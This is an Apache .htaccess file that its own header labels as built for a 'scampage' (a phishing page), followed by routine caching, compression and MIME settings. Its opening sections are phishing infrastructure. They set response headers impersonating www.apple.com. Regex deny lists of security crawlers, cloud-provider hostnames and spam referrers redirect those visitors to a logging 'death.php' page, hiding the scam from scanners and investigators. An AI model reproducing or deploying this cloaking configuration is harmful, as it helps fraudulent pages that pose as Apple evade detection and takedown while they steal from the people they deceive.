Htaccess Skem

1. #########################################################################
2. # ULTIMATE .htaccess FILE FOR SCAMPAGE & PERFORMANCE #
3. #########################################################################
4. # @Author: DwixRMX #
5. # @Author URI: https://l34kc0de.today #
6. # License: GNU General Public License v2 or later #
7. # License URI: http://www.gnu.org/licenses/gpl-2.0.html #
8. #########################################################################
9.  
10. # DNThirTeen:[CORE]
11. ServerSignature Off
12. Options -Indexes
13. Options -ExecCGI
14. Options -MultiViews
15. Options +SymLinksIfOwnerMatch
16. IndexIgnore *
17. RewriteEngine On
18. #AddHandler application/x-httpd-php .dn13 #for custom php extension
19. RewriteBase /
20.  
21. <IfModule mod_headers.c>
22. Header set X_FORWARDED_FOR: 104.16.77.187
23. Header set REMOTE_ADDR: 104.16.77.187
24. Header set Server: www.apple.com
25. Header set Host: www.apple.com
26. Header set Origin: https://www.apple.com
27. Header set Referer: https://www.apple.com
28. Header set X-Forwarded-Host: www.apple.com
29. Header set X-Forwarded-Proto: https
30. </IfModule>
31.  
32. # DNThirTeen:[USER AGENT]
33. <IfModule mod_rewrite.c>
34. RewriteEngine On
35. RewriteCond %{REQUEST_URI} !(death.php) [NC]
36.  
37. #list in regex
38. RewriteCond %{HTTP_USER_AGENT} (360Spider|acapbot|acoonbot|ahrefs|alexibot|asterias|attackbot|backdorbot|suzuran|takeout|teleport|telesoft|true_robots|turingos|turnit|vampire|vikspider|voideye|webleacher|webreaper|webstripper|webvac|webviewer|webwhacker|winhttp|wwwoffle|woxbot|xaldon|xxxyy|yamanalab|yioopbot|youda|zeus|zmeu|zune|zyborg) [NC]
39.  
40. RewriteRule .* /death.php?log [L,NE,E=DN13_USER_AGENT:%1]
41.  
42. </IfModule>
43.  
44. # DNThirTeen:[REMOTE HOST]
45. <IfModule mod_rewrite.c>
46. RewriteEngine On
47. RewriteCond %{REQUEST_URI} !(death.php) [NC]
48.  
49. #list in regex
50. RewriteCond %{REMOTE_HOST} (163data|amazonaws|colocrossing|crimea|g00g1e|justhost|kanagawa|loopia|masterhost|onlinehome|poneytel|sprintdatacenter|reverse.softlayer|safenet|ttnet|woodpecker|wowrack) [NC]
51.  
52. RewriteRule .* /death.php?log [L,NE,E=DN13_REMOTE_HOST:%1]
53.  
54. </IfModule>
55.  
56. # DNThirTeen:[HTTP REFERRER]
57. <IfModule mod_rewrite.c>
58. RewriteEngine On
59. RewriteCond %{REQUEST_URI} !(death.php) [NC]
60.  
61. #list in regex
62. RewriteCond %{HTTP_REFERER} (ambien|blue\spill|cialis|cocaine|ejaculat|erectile|erections|hoodia|huronriveracres|impotence|levitra|libido|lipitor|phentermin|pro[sz]ac|sandyauer|tramadol|troyhamby|ultram|unicauca|valium|viagra|vicodin|xanax|ypxaieo) [NC]
63.  
64. RewriteRule .* /death.php?log [L,NE,E=DN13_HTTP_REFERRER:%1]
65.  
66. </IfModule>
67.  
68. # DNThirTeen:[MUTATION BLOCKER]
69. <Limit GET HEAD OPTIONS POST PUT>
70. Order Allow,Deny
71. #Deny from 127.0.0.1
72.  
73. #HateCrewDeathRoll
74.  
75. Allow from All
76. # RewriteRule .* - [F,L]
77. </Limit>
78.  
79. <IfModule mod_rewrite.c>
80. RewriteEngine On
81. RewriteCond %{HTTPS} !=on
82. RewriteRule ^ https://%{HTTP_HOST}%{REQUEST_URI} [L,R=301]
83. </IfModule>
84.  
85. # ----------------------------------------------------------------------
86. # | Compressing and Caching |
87. # ----------------------------------------------------------------------
88.  
89. <IfModule mod_expires.c>
90. ExpiresActive on
91. ExpiresDefault "access plus 1 month"
92. # CSS
93. ExpiresByType text/css "access plus 1 year"
94. # Data interchange
95. ExpiresByType application/atom+xml "access plus 1 hour"
96. ExpiresByType application/rdf+xml "access plus 1 hour"
97. ExpiresByType application/rss+xml "access plus 1 hour"
98. ExpiresByType application/json "access plus 0 seconds"
99. ExpiresByType application/ld+json "access plus 0 seconds"
100. ExpiresByType application/schema+json "access plus 0 seconds"
101. ExpiresByType application/vnd.geo+json "access plus 0 seconds"
102. ExpiresByType application/xml "access plus 0 seconds"
103. ExpiresByType text/xml "access plus 0 seconds"
104. # Favicon (cannot be renamed!) and cursor images
105. ExpiresByType image/vnd.microsoft.icon "access plus 1 week"
106. ExpiresByType image/x-icon "access plus 1 week"
107. # HTML - Behält die Website eine Stunde im Cache, neues wird erst nach Ablauf einer Stunde
108. # angezeigt. Wenn nicht gewuenscht, bei 3600 eine Null eintragen
109. ExpiresByType text/html "access plus 3600 seconds"
110. # JavaScript
111. ExpiresByType application/javascript "access plus 1 year"
112. ExpiresByType application/x-javascript "access plus 1 year"
113. ExpiresByType text/javascript "access plus 1 year"
114. # Manifest files
115. ExpiresByType application/manifest+json "access plus 1 week"
116. ExpiresByType application/x-web-app-manifest+json "access plus 0 seconds"
117. ExpiresByType text/cache-manifest "access plus 0 seconds"
118. # Media files
119. ExpiresByType audio/ogg "access plus 1 month"
120. ExpiresByType image/bmp "access plus 1 month"
121. ExpiresByType image/gif "access plus 1 month"
122. ExpiresByType image/jpeg "access plus 1 month"
123. ExpiresByType image/png "access plus 1 month"
124. ExpiresByType image/svg+xml "access plus 1 month"
125. ExpiresByType image/webp "access plus 1 month"
126. ExpiresByType video/mp4 "access plus 1 month"
127. ExpiresByType video/ogg "access plus 1 month"
128. ExpiresByType video/webm "access plus 1 month"
129. # Web fonts
130. # Embedded OpenType (EOT)
131. ExpiresByType application/vnd.ms-fontobject "access plus 1 month"
132. ExpiresByType font/eot "access plus 1 month"
133. # OpenType
134. ExpiresByType font/opentype "access plus 1 month"
135. # TrueType
136. ExpiresByType application/x-font-ttf "access plus 1 month"
137. # Web Open Font Format (WOFF) 1.0
138. ExpiresByType application/font-woff "access plus 1 month"
139. ExpiresByType application/x-font-woff "access plus 1 month"
140. ExpiresByType font/woff "access plus 1 month"
141. # Web Open Font Format (WOFF) 2.0
142. ExpiresByType application/font-woff2 "access plus 1 month"
143. # Other
144. ExpiresByType text/x-cross-domain-policy "access plus 1 week"
145. </IfModule>
146.  
147. <IfModule mod_gzip.c>
148. mod_gzip_on Yes
149. mod_gzip_dechunk Yes
150. mod_gzip_item_include file .(html?|txt|css|js|php|pl)$
151. mod_gzip_item_include handler ^cgi-script$
152. mod_gzip_item_include mime ^text/.*
153. mod_gzip_item_include mime ^application/x-javascript.*
154. mod_gzip_item_exclude mime ^image/.*
155. mod_gzip_item_exclude rspheader ^Content-Encoding:.*gzip.*
156. </IfModule>
157.  
158. <IfModule mod_deflate.c>
159. # Insert filters / compress text, html, javascript, css, xml:
160. AddOutputFilterByType DEFLATE text/plain
161. AddOutputFilterByType DEFLATE text/html
162. AddOutputFilterByType DEFLATE text/xml
163. AddOutputFilterByType DEFLATE text/css
164. AddOutputFilterByType DEFLATE text/vtt
165. AddOutputFilterByType DEFLATE text/x-component
166. AddOutputFilterByType DEFLATE application/xml
167. AddOutputFilterByType DEFLATE application/xhtml+xml
168. AddOutputFilterByType DEFLATE application/rss+xml
169. AddOutputFilterByType DEFLATE application/js
170. AddOutputFilterByType DEFLATE application/javascript
171. AddOutputFilterByType DEFLATE application/x-javascript
172. AddOutputFilterByType DEFLATE application/x-httpd-php
173. AddOutputFilterByType DEFLATE application/x-httpd-fastphp
174. AddOutputFilterByType DEFLATE application/atom+xml
175. AddOutputFilterByType DEFLATE application/json
176. AddOutputFilterByType DEFLATE application/ld+json
177. AddOutputFilterByType DEFLATE application/vnd.ms-fontobject
178. AddOutputFilterByType DEFLATE application/x-font-ttf
179. AddOutputFilterByType DEFLATE application/font-woff2
180. AddOutputFilterByType DEFLATE application/x-font-woff
181. AddOutputFilterByType DEFLATE application/x-web-app-manifest+json font/woff
182. AddOutputFilterByType DEFLATE font/woff
183. AddOutputFilterByType DEFLATE font/opentype
184. AddOutputFilterByType DEFLATE image/svg+xml
185. AddOutputFilterByType DEFLATE image/x-icon
186.  
187. # Exception: Images
188. SetEnvIfNoCase REQUEST_URI \.(?:gif|jpg|jpeg|png|svg)$ no-gzip dont-vary
189.  
190. # Drop problematic browsers
191. BrowserMatch ^Mozilla/4 gzip-only-text/html
192. BrowserMatch ^Mozilla/4\.0[678] no-gzip
193. BrowserMatch \bMSI[E] !no-gzip !gzip-only-text/html
194.  
195. # Make sure proxies don't deliver the wrong content
196. Header append Vary User-Agent env=!dont-vary
197. </IfModule>
198.  
199. #Alternative caching using Apache's "mod_headers", if it's installed.
200. #Caching of common files - ENABLED
201. <IfModule mod_headers.c>
202. <FilesMatch "\.(ico|pdf|flv|swf|js|css|gif|png|jpg|jpeg|txt)$">
203. Header set Cache-Control "max-age=2592000, public"
204. </FilesMatch>
205. </IfModule>
206.  
207. <IfModule mod_headers.c>
208. <FilesMatch "\.(js|css|xml|gz)$">
209. Header append Vary Accept-Encoding
210. </FilesMatch>
211. </IfModule>
212.  
213. # Set Keep Alive Header
214. <IfModule mod_headers.c>
215. Header set Connection keep-alive
216. </IfModule>
217.  
218. # If your server don't support ETags deactivate with "None" (and remove header)
219. <IfModule mod_expires.c>
220. <IfModule mod_headers.c>
221. Header unset ETag
222. </IfModule>
223. FileETag None
224. </IfModule>
225.  
226. <IfModule mod_headers.c>
227. <FilesMatch ".(js|css|xml|gz|html|woff|woff2|ttf)$">
228. Header append Vary: Accept-Encoding
229. </FilesMatch>
230. </IfModule>
231.  
232. # -----------------------------------------------------------------------------
233. # HTTP SECURITY HEADER |
234. # -----------------------------------------------------------------------------
235.  
236. ### @see https://scotthelme.co.uk/hardening-your-http-response-headers
237. ### UPDATE 2019
238.  
239. # drop Range header when more than 5 ranges.
240. # CVE-2011-3192
241. SetEnvIf Range (,.*?){5,} bad-range=1
242. RequestHeader unset Range env=bad-range
243. # optional logging.
244. #CustomLog /log common env=bad-range
245.  
246. # LIMIT UPLOAD FILE SIZE TO PROTECT AGAINST DOS ATTACK. Bytes, 0-2147483647(2GB)
247. LimitRequestBody 2147483647
248.  
249. # Don't allow any pages to be framed - Defends against CSRF
250. Header set X-Frame-Options DENY
251.  
252. # Only allow JavaScript from the same domain to be run.
253. # Don't allow inline JavaScript to run.
254. Header set X-Content-Security-Policy "allow 'self';"
255.  
256. ## No-Referrer-Header
257. <IfModule mod_headers.c>
258. Header set Referrer-Policy "no-referrer"
259. </IfModule>
260.  
261. ## X-FRAME-OPTIONS-Header
262. <IfModule mod_headers.c>
263. Header set X-Frame-Options "sameorigin"
264. </IfModule>
265.  
266. ## X-XSS-PROTECTION-Header
267. <IfModule mod_headers.c>
268. Header set X-XSS-Protection "1; mode=block"
269. </IfModule>
270.  
271. ## X-Content-Type-Options-Header
272. <IfModule mod_headers.c>
273. Header set X-Content-Type-Options "nosniff"
274. </IfModule>
275.  
276. ## Strict-Transport-Security-Header - if you are using https on your website, comment this block out
277. <IfModule mod_headers.c>
278. Header set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload"
279. </IfModule>
280.  
281. ## This prevents that false issued certificates for this website can be used unnoticed. (Experimental)
282. ## @see https://tools.ietf.org/html/draft-ietf-httpbis-expect-ct-02
283. <IfModule mod_headers.c>
284. Header set Expect-CT "enforce, max-age=21600"
285. </IfModule>
286.  
287. # ----------------------------------------------------------------------
288. # Webfont access
289. # ----------------------------------------------------------------------
290. # Allow access from all domains for webfonts.Alternatively you could only whitelist your
291. # subdomains like "subdomain.example.com".
292. <IfModule mod_headers.c>
293. <FilesMatch "\.(ttf|ttc|otf|eot|woff|font.css)$">
294. Header set Access-Control-Allow-Origin "*"
295. </FilesMatch>
296. </IfModule>
297.  
298. # ----------------------------------------------------------------------
299. # Proper MIME type for all files
300. # ----------------------------------------------------------------------
301. # JavaScript
302. # Normalize to standard type (it is sniffed in IE anyways)
303. # futher details: tools.ietf.org/html/rfc4329#section-7.2
304. AddType application/javascript js jsonp
305. AddType application/json json
306. #
307. # Audio
308. #
309. AddType audio/ogg oga ogg
310. AddType audio/mp4 m4a f4a f4b
311. #
312. # Video
313. #
314. AddType video/ogg ogv
315. AddType video/mp4 mp4 m4v f4v f4p
316. AddType video/webm webm
317. AddType video/x-flv flv
318. #
319. # SVG
320. # Required for svg webfonts on iPad
321. # futher details: twitter.com/FontSquirrel/status/14855840545
322. #
323. AddType image/svg+xml svg svgz
324. AddEncoding gzip svgz
325. #
326. # Webfonts
327. #
328. AddType application/vnd.ms-fontobject eot
329. AddType application/x-font-ttf ttf ttc
330. AddType font/opentype otf
331. AddType application/x-font-woff woff
332. #
333. # Assorted types
334. #
335. AddType image/x-icon ico
336. AddType image/webp webp
337. AddType text/cache-manifest appcache manifest
338. AddType text/x-component htc
339. AddType application/xml rss atom xml rdf
340. AddType application/x-chrome-extension crx
341. AddType application/x-opera-extension oex
342. AddType application/x-xpinstall xpi
343. AddType application/octet-stream safariextz
344. AddType application/x-web-app-manifest+json webapp
345. AddType text/x-vcard vcf
346. AddType application/x-shockwave-flash swf
347. AddType text/vtt vtt
348.  
349. # ----------------------------------------------------------------------
350. # End!
351. # ----------------------------------------------------------------------